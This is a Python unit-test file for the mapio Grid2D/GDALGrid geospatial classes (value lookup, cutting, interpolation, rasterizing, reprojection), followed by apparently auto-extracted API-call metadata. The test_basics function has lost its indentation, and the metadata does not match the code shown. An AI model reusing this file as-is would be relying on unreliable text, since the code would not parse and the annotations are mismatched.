    np.testing.assert_almost_equal(finegrid.getData(), output)
    print('Passed subdivide with mean parameter...')
    print('Passed subdivide method test - non-aligned grids.')
def test_basics():
geodict = GeoDict({'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5,
'ymax': 3.5, 'dx': 1.0, 'dy': 1.0, 'ny': 4, 'nx': 4})
data = np.arange(0, 16).reshape(4, 4).astype(np.float32)
grid = Grid2D(data, geodict)
print('Testing basic Grid2D functionality (retrieving data, lat/lon to pixel coordinates, etc...')
np.testing.assert_almost_equal(grid.getData(), data)
assert grid.getGeoDict() == geodict
assert grid.getBounds() == (geodict.xmin, geodict.xmax, geodict.ymin, geodict.ymax)
lat, lon = grid.getLatLon(0, 0)
assert lat == 3.5 and lon == 0.5
row, col = grid.getRowCol(lat, lon)
assert row == 0 and col == 0
value = grid.getValue(lat, lon)
assert value == 0
frow, fcol = grid.getRowCol(1.0, 3.0, returnFloat=True)
assert frow == 2.5 and fcol == 2.5
irow, icol = grid.getRowCol(1.0, 3.0, returnFloat=False)
assert irow == 2 and icol == 2
# test getting values in and outside of the grid bounds
lat = np.array([0.0, 0.5, 2.5, 4.0])
lon = np.array([0.0, 0.5, 2.5, 4.0])
default = np.nan
output = np.array([np.nan, 12, 6, np.nan])
value = grid.getValue(lat, lon, default=default)
np.testing.assert_almost_equal(value, output)
print('Passed basic Grid2D functionality (retrieving data, lat/lon to pixel coordinates, etc...')
def test_getvalue():
    """Check Grid2D.getValue() with scalar, vector (1-D) and matrix (2-D)
    coordinate inputs on a 5x5 grid."""
    values = np.arange(1, 26).reshape(5, 5)
    gd = GeoDict({'xmin': 1.0, 'xmax': 5.0, 'ymin': 1.0, 'ymax': 5.0,
                  'dx': 1.0, 'dy': 1.0, 'nx': 5, 'ny': 5})
    grid = Grid2D(values, gd)
    # scalar lookup at the grid center
    assert grid.getValue(3.0, 3.0) == 13
    # vector lookup
    lats = np.array([3.0, 4.0])
    lons = np.array([3.0, 3.0])
    np.testing.assert_almost_equal(grid.getValue(lats, lons), np.array([13, 8]))
    # matrix lookup preserves the input shape
    lats = np.array([[3.0, 4.0], [4.0, 5.0]])
    lons = np.array([[3.0, 3.0], [4.0, 4.0]])
    np.testing.assert_almost_equal(grid.getValue(lats, lons),
                                   np.array([[13, 8], [9, 4]]))
def test_cut():
    """Test Grid2D.cut() extraction.

    Covers: a simple aligned sub-window, trimming to bounds computed via
    getBoundsWithin(), and cutting with align=True where the requested
    bounds are snapped to the grid's own cell edges.
    """
    geodict = GeoDict({'xmin': 0.5, 'xmax': 4.5, 'ymin': 0.5,
                       'ymax': 4.5, 'dx': 1.0, 'dy': 1.0, 'ny': 5, 'nx': 5})
    data = np.arange(0, 25).reshape(5, 5)
    print('Testing data extraction...')
    grid = Grid2D(data, geodict)
    xmin, xmax, ymin, ymax = (2.5, 3.5, 2.5, 3.5)
    newgrid = grid.cut(xmin, xmax, ymin, ymax)
    output = np.array([[7, 8], [12, 13]])
    np.testing.assert_almost_equal(newgrid.getData(), output)
    print('Passed data extraction...')
    print('Testing data trimming with resampling...')
    # make a more complicated test using getboundswithin
    data = np.arange(0, 84).reshape(7, 12)
    geodict = GeoDict({'xmin': -180, 'xmax': 150,
                       'ymin': -90, 'ymax': 90,
                       'dx': 30, 'dy': 30,
                       'nx': 12, 'ny': 7})
    grid = Grid2D(data, geodict)
    sampledict = GeoDict.createDictFromBox(-75,
                                           45, -45, 75, geodict.dx, geodict.dy)
    cutdict = geodict.getBoundsWithin(sampledict)
    newgrid = grid.cut(cutdict.xmin, cutdict.xmax, cutdict.ymin, cutdict.ymax)
    output = np.array([[16, 17, 18, 19],
                       [28, 29, 30, 31],
                       [40, 41, 42, 43],
                       [52, 53, 54, 55]])
    np.testing.assert_almost_equal(newgrid.getData(), output)
    print('Passed data trimming with resampling...')
    print('Test cut with self-alignment...')
    geodict = GeoDict({'xmin': 0.5, 'xmax': 4.5,
                       'ymin': 0.5, 'ymax': 6.5,
                       'dx': 1.0, 'dy': 1.0,
                       'nx': 5, 'ny': 7})
    data = np.arange(0, 35).astype(np.float32).reshape(7, 5)
    grid = Grid2D(data, geodict)
    # bounds deliberately off-grid; align=True snaps them to cell edges
    cutxmin = 1.7
    cutxmax = 3.7
    cutymin = 1.7
    cutymax = 5.7
    cutgrid = grid.cut(cutxmin, cutxmax, cutymin, cutymax, align=True)
    output = np.array([[7, 8],
                       [12, 13],
                       [17, 18],
                       [22, 23]])
    np.testing.assert_almost_equal(cutgrid.getData(), output)
    print('Passed cut with self-alignment.')
def test_interpolate():
    """Test interpolateToGrid()/interpolate2() for every supported method,
    then compare the speed of the two implementations.

    Fixes a latent bug: the original if/elif/else chain ended in
    ``else: pass``, which left ``output`` unbound (NameError) for any
    unexpected method name.  A dict lookup now raises KeyError immediately.
    """
    geodict = GeoDict({'xmin': 0.5, 'xmax': 6.5, 'ymin': 1.5,
                       'ymax': 6.5, 'dx': 1.0, 'dy': 1.0, 'ny': 6, 'nx': 7})
    data = np.arange(14, 56).reshape(6, 7)
    # expected samples for each method; 'linear' and 'cubic' agree because
    # the input surface is planar
    expected = {'nearest': np.array([[30.0, 31.0], [37.0, 38.0]]),
                'linear': np.array([[34., 35.], [41., 42.]]),
                'cubic': np.array([[34., 35.], [41., 42.]])}
    for method in ['nearest', 'linear', 'cubic']:
        print('Testing interpolate with method "%s"...' % method)
        grid = Grid2D(data, geodict)
        sampledict = GeoDict({'xmin': 3.0, 'xmax': 4.0,
                             'ymin': 3.0, 'ymax': 4.0,
                             'dx': 1.0, 'dy': 1.0,
                             'ny': 2, 'nx': 2})
        grid = grid.interpolateToGrid(sampledict, method=method)
        tgrid = grid.interpolate2(sampledict, method=method)
        output = expected[method]
        np.testing.assert_almost_equal(grid.getData(), output)
        print('Passed interpolate with method "%s".' % method)
        np.testing.assert_almost_equal(tgrid.getData(), output)
        print('Passed interpolate2 with method "%s".' % method)
    # speed test of interpolateToGrid and interpolate2
    geodict = GeoDict.createDictFromBox(0, 10, 0, 10, 0.01, 0.01)
    data = np.random.rand(geodict.ny, geodict.nx)
    grid = Grid2D(data, geodict)
    sampledict = GeoDict.createDictFromBox(2, 8, 2, 8, 0.098, 0.098)
    t1 = time.time()
    grid2 = grid.interpolateToGrid(sampledict, method='linear')
    t2 = time.time()
    grid3 = grid.interpolate2(sampledict, method='linear')
    t3 = time.time()
    # np.testing.assert_almost_equal(grid2._data.sum(),grid3._data.sum())
    print('scipy method: %.3f seconds' % (t2-t1))
    print('gdal method: %.3f seconds' % (t3-t2))
def test_rasterize():
    """Test Grid2D.rasterizeFromGeometry() burning polygon attribute values
    into a grid, with and without the pixel-center containment rule.
    """
    geodict = GeoDict({'xmin': 0.5, 'xmax': 3.5,
                       'ymin': 0.5, 'ymax': 3.5,
                       'dx': 1.0, 'dy': 1.0,
                       'ny': 4, 'nx': 4})
    print('Testing rasterizeFromGeometry() burning in values from a polygon sequence...')
    # Define two simple polygons and assign them to shapes
    poly1 = [(0.25, 3.75), (1.25, 3.25), (1.25, 2.25)]
    poly2 = [(2.25, 3.75), (3.25, 3.75), (3.75, 2.75),
             (3.75, 1.50), (3.25, 0.75), (2.25, 2.25)]
    # GeoJSON-like features: polygon geometry plus a 'value' attribute to burn
    shape1 = {'properties': {'value': 5}, 'geometry': mapping(Polygon(poly1))}
    shape2 = {'properties': {'value': 7}, 'geometry': mapping(Polygon(poly2))}
    shapes = [shape1, shape2]
    print('Testing burning in values where polygons need not contain pixel centers...')
    # any pixel touched by a polygon receives its value
    grid = Grid2D.rasterizeFromGeometry(
        shapes, geodict, fillValue=0, attribute='value', mustContainCenter=False)
    output = np.array([[5, 5, 7, 7],
                       [5, 5, 7, 7],
                       [0, 0, 7, 7],
                       [0, 0, 0, 7]])
    np.testing.assert_almost_equal(grid.getData(), output)
    print('Passed burning in values where polygons need not contain pixel centers.')
    print('Testing burning in values where polygons must contain pixel centers...')
    # stricter rule: only pixels whose centers fall inside a polygon are burned
    grid2 = Grid2D.rasterizeFromGeometry(
        shapes, geodict, fillValue=0, attribute='value', mustContainCenter=True)
    output = np.array([[5, 0, 7, 0],
                       [0, 0, 7, 7],
                       [0, 0, 0, 7],
                       [0, 0, 0, 0]])
    np.testing.assert_almost_equal(grid2.getData(), output)
    print('Passed burning in values where polygons must contain pixel centers.')
def test_copy():
    """Verify copyFromGrid() produces an independent (deep) copy.

    The original test only printed the copy's data and geodict and asserted
    nothing; it now checks that mutating the source grid does not leak into
    the copy.
    """
    data = np.arange(0, 16).astype(np.float32).reshape(4, 4)
    geodict = GeoDict({'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5,
                       'ymax': 3.5, 'dx': 1.0, 'dy': 1.0, 'ny': 4, 'nx': 4})
    grid1 = Grid2D(data, geodict)
    grid2 = grid1.copyFromGrid(grid1)
    # mutate the source; the copy must be unaffected
    grid1._data[0, 0] = np.nan
    assert not np.isnan(grid2._data[0, 0])
    np.testing.assert_almost_equal(
        grid2._data, np.arange(0, 16).astype(np.float32).reshape(4, 4))
    assert grid2._geodict == grid1._geodict
    print(grid2._data)
    print(grid2._geodict)
def test_setData():
    """Verify setData() accepts a same-shape array and rejects bad input.

    The original version only *printed* on unexpected outcomes, so a broken
    setData() could never fail the test; the unexpected branches now raise.
    """
    data = np.arange(0, 16).astype(np.float32).reshape(4, 4)
    geodict = GeoDict({'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5,
                       'ymax': 3.5, 'dx': 1.0, 'dy': 1.0, 'ny': 4, 'nx': 4})
    grid1 = Grid2D(data, geodict)
    try:
        grid1.setData(np.ones((4, 4)))  # same shape: must succeed
        print('setData test passed.')
    except DataSetException:
        print('setData test failed.')
        raise  # a correctly-shaped array must be accepted
    try:
        grid1.setData(np.ones((5, 5)))  # wrong shape: must raise
        print('setData test did not fail when it should have.')
        raise AssertionError('setData accepted a mis-shaped array')
    except DataSetException:
        print('setData test failed as expected.')
    try:
        grid1.setData('fred')  # non-array input: must raise
        print('setData test did not fail when it should have.')
        raise AssertionError('setData accepted a non-array value')
    except DataSetException:
        print('setData test failed as expected.')
def get_data_range_test():
    """Test Grid2D.getDataRange() index-window computation.

    Covers sample windows that do and do not cross the 180 meridian; the
    crossing cases are expected to return two index windows (suffix 1 and
    suffix 2).  NOTE(review): not named ``test_*`` and not called from
    ``__main__``, so this test is currently never run.
    """
    # a standard global grid, going from -180 to 180
    normal_dict = GeoDict({'xmin': -180, 'xmax': 120,
                           'ymin': -90, 'ymax': 90,
                           'dx': 60, 'dy': 45,
                           'nx': 6, 'ny': 5})
    # test a simple example which does NOT cross the 180 meridian
    sample1 = (-125, 65, -20, 20)
    dict1 = Grid2D.getDataRange(normal_dict, sample1)
    cdict1 = {'iulx1': 0, 'iuly1': 1,
              'ilrx1': 6, 'ilry1': 4}
    assert dict1 == cdict1
    # test a less-simple example which DOES cross the 180 meridian
    sample2 = (-235, -10, -20, 20)
    dict2 = Grid2D.getDataRange(normal_dict, sample2)
    cdict2 = {'iulx1': 5, 'iuly1': 1,
              'ilrx1': 6, 'ilry1': 4,
              'iulx2': 0, 'iuly2': 1,
              'ilrx2': 4, 'ilry2': 4}
    assert dict2 == cdict2
    # test a less-simple example which DOES cross the 180 meridian, and xmin > xmax
    sample3 = (125, -10, -20, 20)
    dict3 = Grid2D.getDataRange(normal_dict, sample3)
    cdict3 = {'iulx1': 5, 'iuly1': 1,
              'ilrx1': 6, 'ilry1': 4,
              'iulx2': 0, 'iuly2': 1,
              'ilrx2': 4, 'ilry2': 4}
    assert dict3 == cdict3
    # test an example where the sample bounds are from 0 to 360
    sample4 = (160, 200, -20, 20)
    dict4 = Grid2D.getDataRange(normal_dict, sample4)
    cdict4 = {'iulx1': 5, 'iuly1': 1,
              'ilrx1': 6, 'ilry1': 4,
              'iulx2': 0, 'iuly2': 1,
              'ilrx2': 2, 'ilry2': 4}
    assert dict4 == cdict4
    # test an example where the sample bounds are from 0 to 360
    sample5 = (220, 260, -20, 20)
    dict5 = Grid2D.getDataRange(normal_dict, sample5)
    cdict5 = {'iulx1': 0, 'iuly1': 1,
              'ilrx1': 3, 'ilry1': 4}
    assert dict5 == cdict5
def test_project():
    """Exercise GDALGrid.project(): a grid wrapping the 180 meridian, a
    simple UTM projection, and a manual rasterio reprojection.

    Fixes two defects: a bare ``except: pass`` that silently swallowed all
    errors (now a logged ``except Exception``), and ``finally:
    shutil.rmtree(tdir)`` raising NameError whenever ``mkdtemp()`` itself
    failed (tdir is now created before the try block).  Dead ``x = 1``
    placeholder locals are removed.
    """
    # test projecting a grid that wraps the 180 meridian
    gd = GeoDict.createDictFromBox(175, -175, -5, 5, 1.0, 1.0)
    ncells = gd.ny * gd.nx
    data = np.arange(0.0, ncells).reshape(gd.ny, gd.nx)
    grid = GDALGrid(data, gd)
    projstr = "+proj=merc +lat_ts=55 +lon_0=180 +ellps=WGS84"
    newgrid = grid.project(projstr, method='nearest')
    proj = pyproj.Proj(projstr)
    # what would the ul/lr corners be?
    ulx, uly = proj(grid._geodict.xmin, grid._geodict.ymax)
    lrx, lry = proj(grid._geodict.xmax, grid._geodict.ymin)
    # what if we back-project?
    newxmin, newymax = proj(newgrid._geodict.xmin,
                            newgrid._geodict.ymax, inverse=True)
    newxmax, newymin = proj(newgrid._geodict.xmax,
                            newgrid._geodict.ymin, inverse=True)
    # test simple projection
    data = np.array([[0, 0, 1, 0, 0],
                     [0, 0, 1, 0, 0],
                     [1, 1, 1, 1, 1],
                     [0, 0, 1, 0, 0],
                     [0, 0, 1, 0, 0]], dtype=np.int32)
    geodict = {'xmin': 50, 'xmax': 50.4, 'ymin': 50,
               'ymax': 50.4, 'dx': 0.1, 'dy': 0.1, 'nx': 5, 'ny': 5}
    gd = GeoDict(geodict)
    grid = GDALGrid(data, gd)
    projstr = "+proj=utm +zone=40 +north +ellps=WGS84 +datum=WGS84 +units=m +no_defs "
    newgrid = grid.project(projstr, method='nearest')
    # create the temp dir *before* the try block so the finally clause can
    # always clean it up
    tdir = tempfile.mkdtemp()
    try:
        outfile = os.path.join(tdir, 'output.bil')
        grid.save(outfile)
        with rasterio.open(outfile) as src:
            aff = get_affine(src)
            data = src.read(1)
            src_crs = CRS().from_string(GeoDict.DEFAULT_PROJ4).to_dict()
            dst_crs = CRS().from_string(projstr).to_dict()
            nrows, ncols = data.shape
            left = aff.xoff
            top = aff.yoff
            right, bottom = aff * (ncols-1, nrows-1)
            dst_transform, width, height = calculate_default_transform(
                src_crs, dst_crs, ncols, nrows, left, bottom, right, top)
            destination = np.zeros((height, width))
            reproject(data,
                      destination,
                      src_transform=aff,
                      src_crs=src_crs,
                      dst_transform=dst_transform,
                      dst_crs=dst_crs,
                      src_nodata=src.nodata,
                      dst_nodata=np.nan,
                      resampling=Resampling.nearest)
    except Exception as error:
        # still best-effort (this comparison is informative only), but make
        # the failure visible instead of silently swallowing it
        print('rasterio reprojection comparison failed: %s' % str(error))
    finally:
        shutil.rmtree(tdir)
    # cmpdata = np.array([[ 0., 0., 1., 0.],
    #                     [ 0., 0., 1., 0.],
    #                     [ 0., 0., 1., 0.],
    #                     [ 1., 1., 1., 1.],
    #                     [ 0., 1., 1., 1.],
    #                     [ 0., 0., 1., 0.]],dtype=np.float64)
    # np.testing.assert_almost_equal(cmpdata,newgrid._data)
    # cmpdict = GeoDict({'ymax': 5608705.974598191,
    #                    'ny': 6,
    #                    'ymin': 5571237.8659376735,
    #                    'nx': 4,
    #                    'xmax': 21363.975311354592,
    #                    'dy': 7493.621732103531,
    #                    'dx': 7493.621732103531,
    #                    'xmin': -756.8898849560019})
    # assert cmpdict == newgrid._geodict
if __name__ == '__main__':
    # Run the full suite when executed as a script.
    # NOTE(review): get_data_range_test() is commented out and its name does
    # not start with test_, so it is never exercised by pytest either.
    test_getvalue()
    test_project()
    test_subdivide()
    test_rasterize()
    test_interpolate()
    test_basics()
    test_cut()
    test_copy()
    test_setData()
    # get_data_range_test()
| [
"mapio.grid2d.Grid2D",
"rasterio.warp.reproject",
"mapio.geodict.GeoDict",
"numpy.ones",
"rasterio.crs.CRS",
"numpy.arange",
"mapio.gdal.get_affine",
"shutil.rmtree",
"os.path.join",
"os.path.abspath",
"shapely.geometry.Polygon",
"numpy.testing.assert_almost_equal",
"tempfile.mkdtemp",
"ma... | [((500, 528), 'sys.path.insert', 'sys.path.insert', (['(0)', 'mapiodir'], {}), '(0, mapiodir)\n', (515, 528), False, 'import sys\n'), ((313, 338), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (328, 338), False, 'import os\n'), ((392, 419), 'os.path.join', 'os.path.join', (['homedir', '""".."""'], {}), "(homedir, '..')\n", (404, 419), False, 'import os\n'), ((1190, 1295), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.0, 'xmax': 1.0, 'ymin': 0.0, 'ymax': 1.0, 'dx': 1.0, 'dy': 1.0,\n 'ny': 2, 'nx': 2}"], {}), "({'xmin': 0.0, 'xmax': 1.0, 'ymin': 0.0, 'ymax': 1.0, 'dx': 1.0,\n 'dy': 1.0, 'ny': 2, 'nx': 2})\n", (1197, 1295), False, 'from mapio.geodict import GeoDict\n'), ((1376, 1397), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (1382, 1397), False, 'from mapio.grid2d import Grid2D\n'), ((1413, 1583), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.0 - 1.0 / 3.0, 'xmax': 1.0 + 1.0 / 3.0, 'ymin': 0.0 - 1.0 / 3.0,\n 'ymax': 1.0 + 1.0 / 3.0, 'dx': 1.0 / 3.0, 'dy': 1.0 / 3.0, 'ny': 6, 'nx': 6\n }"], {}), "({'xmin': 0.0 - 1.0 / 3.0, 'xmax': 1.0 + 1.0 / 3.0, 'ymin': 0.0 - \n 1.0 / 3.0, 'ymax': 1.0 + 1.0 / 3.0, 'dx': 1.0 / 3.0, 'dy': 1.0 / 3.0,\n 'ny': 6, 'nx': 6})\n", (1420, 1583), False, 'from mapio.geodict import GeoDict\n'), ((1692, 1904), 'numpy.array', 'np.array', (['[[0.0, 0.0, 0.0, 1.0, 1.0, 1.0], [0.0, 0.0, 0.0, 1.0, 1.0, 1.0], [0.0, 0.0,\n 0.0, 1.0, 1.0, 1.0], [2.0, 2.0, 2.0, 3.0, 3.0, 3.0], [2.0, 2.0, 2.0, \n 3.0, 3.0, 3.0], [2.0, 2.0, 2.0, 3.0, 3.0, 3.0]]'], {}), '([[0.0, 0.0, 0.0, 1.0, 1.0, 1.0], [0.0, 0.0, 0.0, 1.0, 1.0, 1.0], [\n 0.0, 0.0, 0.0, 1.0, 1.0, 1.0], [2.0, 2.0, 2.0, 3.0, 3.0, 3.0], [2.0, \n 2.0, 2.0, 3.0, 3.0, 3.0], [2.0, 2.0, 2.0, 3.0, 3.0, 3.0]])\n', (1700, 1904), True, 'import numpy as np\n'), ((2245, 2352), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.0, 'xmax': 10.0, 'ymin': 0.0, 'ymax': 10.0, 'dx': 5.0, 'dy': 5.0,\n 'ny': 3, 'nx': 3}"], {}), "({'xmin': 0.0, 
'xmax': 10.0, 'ymin': 0.0, 'ymax': 10.0, 'dx': 5.0,\n 'dy': 5.0, 'ny': 3, 'nx': 3})\n", (2252, 2352), False, 'from mapio.geodict import GeoDict\n'), ((2433, 2454), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (2439, 2454), False, 'from mapio.grid2d import Grid2D\n'), ((2470, 2579), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': -2.5, 'xmax': 11.5, 'ymin': -1.5, 'ymax': 10.5, 'dx': 2.0, 'dy': \n 2.0, 'nx': 8, 'ny': 7}"], {}), "({'xmin': -2.5, 'xmax': 11.5, 'ymin': -1.5, 'ymax': 10.5, 'dx': 2.0,\n 'dy': 2.0, 'nx': 8, 'ny': 7})\n", (2477, 2579), False, 'from mapio.geodict import GeoDict\n'), ((2789, 3099), 'numpy.array', 'np.array', (['[[N, 0.0, 0.0, 1.0, 1.0, 1.0, 2.0, 2.0], [N, 0.0, 0.0, 1.0, 1.0, 1.0, 2.0, \n 2.0], [N, 3.0, 3.0, 4.0, 4.0, 4.0, 5.0, 5.0], [N, 3.0, 3.0, 4.0, 4.0, \n 4.0, 5.0, 5.0], [N, 3.0, 3.0, 4.0, 4.0, 4.0, 5.0, 5.0], [N, 6.0, 6.0, \n 7.0, 7.0, 7.0, 8.0, 8.0], [N, 6.0, 6.0, 7.0, 7.0, 7.0, 8.0, 8.0]]'], {}), '([[N, 0.0, 0.0, 1.0, 1.0, 1.0, 2.0, 2.0], [N, 0.0, 0.0, 1.0, 1.0, \n 1.0, 2.0, 2.0], [N, 3.0, 3.0, 4.0, 4.0, 4.0, 5.0, 5.0], [N, 3.0, 3.0, \n 4.0, 4.0, 4.0, 5.0, 5.0], [N, 3.0, 3.0, 4.0, 4.0, 4.0, 5.0, 5.0], [N, \n 6.0, 6.0, 7.0, 7.0, 7.0, 8.0, 8.0], [N, 6.0, 6.0, 7.0, 7.0, 7.0, 8.0, 8.0]]\n )\n', (2797, 3099), True, 'import numpy as np\n'), ((3508, 3818), 'numpy.array', 'np.array', (['[[N, 0.0, 0.0, 1.0, 1.0, 2.0, 2.0, 2.0], [N, 0.0, 0.0, 1.0, 1.0, 2.0, 2.0, \n 2.0], [N, 3.0, 3.0, 4.0, 4.0, 5.0, 5.0, 5.0], [N, 3.0, 3.0, 4.0, 4.0, \n 5.0, 5.0, 5.0], [N, 6.0, 6.0, 7.0, 7.0, 8.0, 8.0, 8.0], [N, 6.0, 6.0, \n 7.0, 7.0, 8.0, 8.0, 8.0], [N, 6.0, 6.0, 7.0, 7.0, 8.0, 8.0, 8.0]]'], {}), '([[N, 0.0, 0.0, 1.0, 1.0, 2.0, 2.0, 2.0], [N, 0.0, 0.0, 1.0, 1.0, \n 2.0, 2.0, 2.0], [N, 3.0, 3.0, 4.0, 4.0, 5.0, 5.0, 5.0], [N, 3.0, 3.0, \n 4.0, 4.0, 5.0, 5.0, 5.0], [N, 6.0, 6.0, 7.0, 7.0, 8.0, 8.0, 8.0], [N, \n 6.0, 6.0, 7.0, 7.0, 8.0, 8.0, 8.0], [N, 6.0, 6.0, 7.0, 7.0, 8.0, 8.0, 8.0]]\n )\n', (3516, 3818), True, 'import numpy 
as np\n'), ((4229, 4539), 'numpy.array', 'np.array', (['[[N, 0.0, 0.0, 1.0, 1.0, 1.5, 2.0, 2.0], [N, 0.0, 0.0, 1.0, 1.0, 1.5, 2.0, \n 2.0], [N, 3.0, 3.0, 4.0, 4.0, 4.5, 5.0, 5.0], [N, 3.0, 3.0, 4.0, 4.0, \n 4.5, 5.0, 5.0], [N, 4.5, 4.5, 5.5, 5.5, 6.0, 6.5, 6.5], [N, 6.0, 6.0, \n 7.0, 7.0, 7.5, 8.0, 8.0], [N, 6.0, 6.0, 7.0, 7.0, 7.5, 8.0, 8.0]]'], {}), '([[N, 0.0, 0.0, 1.0, 1.0, 1.5, 2.0, 2.0], [N, 0.0, 0.0, 1.0, 1.0, \n 1.5, 2.0, 2.0], [N, 3.0, 3.0, 4.0, 4.0, 4.5, 5.0, 5.0], [N, 3.0, 3.0, \n 4.0, 4.0, 4.5, 5.0, 5.0], [N, 4.5, 4.5, 5.5, 5.5, 6.0, 6.5, 6.5], [N, \n 6.0, 6.0, 7.0, 7.0, 7.5, 8.0, 8.0], [N, 6.0, 6.0, 7.0, 7.0, 7.5, 8.0, 8.0]]\n )\n', (4237, 4539), True, 'import numpy as np\n'), ((4929, 5034), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5, 'ymax': 3.5, 'dx': 1.0, 'dy': 1.0,\n 'ny': 4, 'nx': 4}"], {}), "({'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5, 'ymax': 3.5, 'dx': 1.0,\n 'dy': 1.0, 'ny': 4, 'nx': 4})\n", (4936, 5034), False, 'from mapio.geodict import GeoDict\n'), ((5126, 5147), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (5132, 5147), False, 'from mapio.grid2d import Grid2D\n'), ((5918, 5948), 'numpy.array', 'np.array', (['[0.0, 0.5, 2.5, 4.0]'], {}), '([0.0, 0.5, 2.5, 4.0])\n', (5926, 5948), True, 'import numpy as np\n'), ((5959, 5989), 'numpy.array', 'np.array', (['[0.0, 0.5, 2.5, 4.0]'], {}), '([0.0, 0.5, 2.5, 4.0])\n', (5967, 5989), True, 'import numpy as np\n'), ((6024, 6057), 'numpy.array', 'np.array', (['[np.nan, 12, 6, np.nan]'], {}), '([np.nan, 12, 6, np.nan])\n', (6032, 6057), True, 'import numpy as np\n'), ((6116, 6161), 'numpy.testing.assert_almost_equal', 'np.testing.assert_almost_equal', (['value', 'output'], {}), '(value, output)\n', (6146, 6161), True, 'import numpy as np\n'), ((6343, 6448), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 1.0, 'xmax': 5.0, 'ymin': 1.0, 'ymax': 5.0, 'dx': 1.0, 'dy': 1.0,\n 'nx': 5, 'ny': 5}"], {}), "({'xmin': 1.0, 'xmax': 5.0, 'ymin': 1.0, 
'ymax': 5.0, 'dx': 1.0,\n 'dy': 1.0, 'nx': 5, 'ny': 5})\n", (6350, 6448), False, 'from mapio.geodict import GeoDict\n'), ((6603, 6623), 'mapio.grid2d.Grid2D', 'Grid2D', (['array', 'gdict'], {}), '(array, gdict)\n', (6609, 6623), False, 'from mapio.grid2d import Grid2D\n'), ((6675, 6695), 'numpy.array', 'np.array', (['[3.0, 4.0]'], {}), '([3.0, 4.0])\n', (6683, 6695), True, 'import numpy as np\n'), ((6706, 6726), 'numpy.array', 'np.array', (['[3.0, 3.0]'], {}), '([3.0, 3.0])\n', (6714, 6726), True, 'import numpy as np\n'), ((6832, 6866), 'numpy.array', 'np.array', (['[[3.0, 4.0], [4.0, 5.0]]'], {}), '([[3.0, 4.0], [4.0, 5.0]])\n', (6840, 6866), True, 'import numpy as np\n'), ((6897, 6931), 'numpy.array', 'np.array', (['[[3.0, 3.0], [4.0, 4.0]]'], {}), '([[3.0, 3.0], [4.0, 4.0]])\n', (6905, 6931), True, 'import numpy as np\n'), ((7091, 7196), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.5, 'xmax': 4.5, 'ymin': 0.5, 'ymax': 4.5, 'dx': 1.0, 'dy': 1.0,\n 'ny': 5, 'nx': 5}"], {}), "({'xmin': 0.5, 'xmax': 4.5, 'ymin': 0.5, 'ymax': 4.5, 'dx': 1.0,\n 'dy': 1.0, 'ny': 5, 'nx': 5})\n", (7098, 7196), False, 'from mapio.geodict import GeoDict\n'), ((7310, 7331), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (7316, 7331), False, 'from mapio.grid2d import Grid2D\n'), ((7442, 7470), 'numpy.array', 'np.array', (['[[7, 8], [12, 13]]'], {}), '([[7, 8], [12, 13]])\n', (7450, 7470), True, 'import numpy as np\n'), ((7741, 7845), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': -180, 'xmax': 150, 'ymin': -90, 'ymax': 90, 'dx': 30, 'dy': 30,\n 'nx': 12, 'ny': 7}"], {}), "({'xmin': -180, 'xmax': 150, 'ymin': -90, 'ymax': 90, 'dx': 30, 'dy':\n 30, 'nx': 12, 'ny': 7})\n", (7748, 7845), False, 'from mapio.geodict import GeoDict\n'), ((7922, 7943), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (7928, 7943), False, 'from mapio.grid2d import Grid2D\n'), ((7961, 8028), 'mapio.geodict.GeoDict.createDictFromBox', 
'GeoDict.createDictFromBox', (['(-75)', '(45)', '(-45)', '(75)', 'geodict.dx', 'geodict.dy'], {}), '(-75, 45, -45, 75, geodict.dx, geodict.dy)\n', (7986, 8028), False, 'from mapio.geodict import GeoDict\n'), ((8214, 8300), 'numpy.array', 'np.array', (['[[16, 17, 18, 19], [28, 29, 30, 31], [40, 41, 42, 43], [52, 53, 54, 55]]'], {}), '([[16, 17, 18, 19], [28, 29, 30, 31], [40, 41, 42, 43], [52, 53, 54,\n 55]])\n', (8222, 8300), True, 'import numpy as np\n'), ((8541, 8646), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.5, 'xmax': 4.5, 'ymin': 0.5, 'ymax': 6.5, 'dx': 1.0, 'dy': 1.0,\n 'nx': 5, 'ny': 7}"], {}), "({'xmin': 0.5, 'xmax': 4.5, 'ymin': 0.5, 'ymax': 6.5, 'dx': 1.0,\n 'dy': 1.0, 'nx': 5, 'ny': 7})\n", (8548, 8646), False, 'from mapio.geodict import GeoDict\n'), ((8784, 8805), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (8790, 8805), False, 'from mapio.grid2d import Grid2D\n'), ((8962, 9010), 'numpy.array', 'np.array', (['[[7, 8], [12, 13], [17, 18], [22, 23]]'], {}), '([[7, 8], [12, 13], [17, 18], [22, 23]])\n', (8970, 9010), True, 'import numpy as np\n'), ((9227, 9332), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.5, 'xmax': 6.5, 'ymin': 1.5, 'ymax': 6.5, 'dx': 1.0, 'dy': 1.0,\n 'ny': 6, 'nx': 7}"], {}), "({'xmin': 0.5, 'xmax': 6.5, 'ymin': 1.5, 'ymax': 6.5, 'dx': 1.0,\n 'dy': 1.0, 'ny': 6, 'nx': 7})\n", (9234, 9332), False, 'from 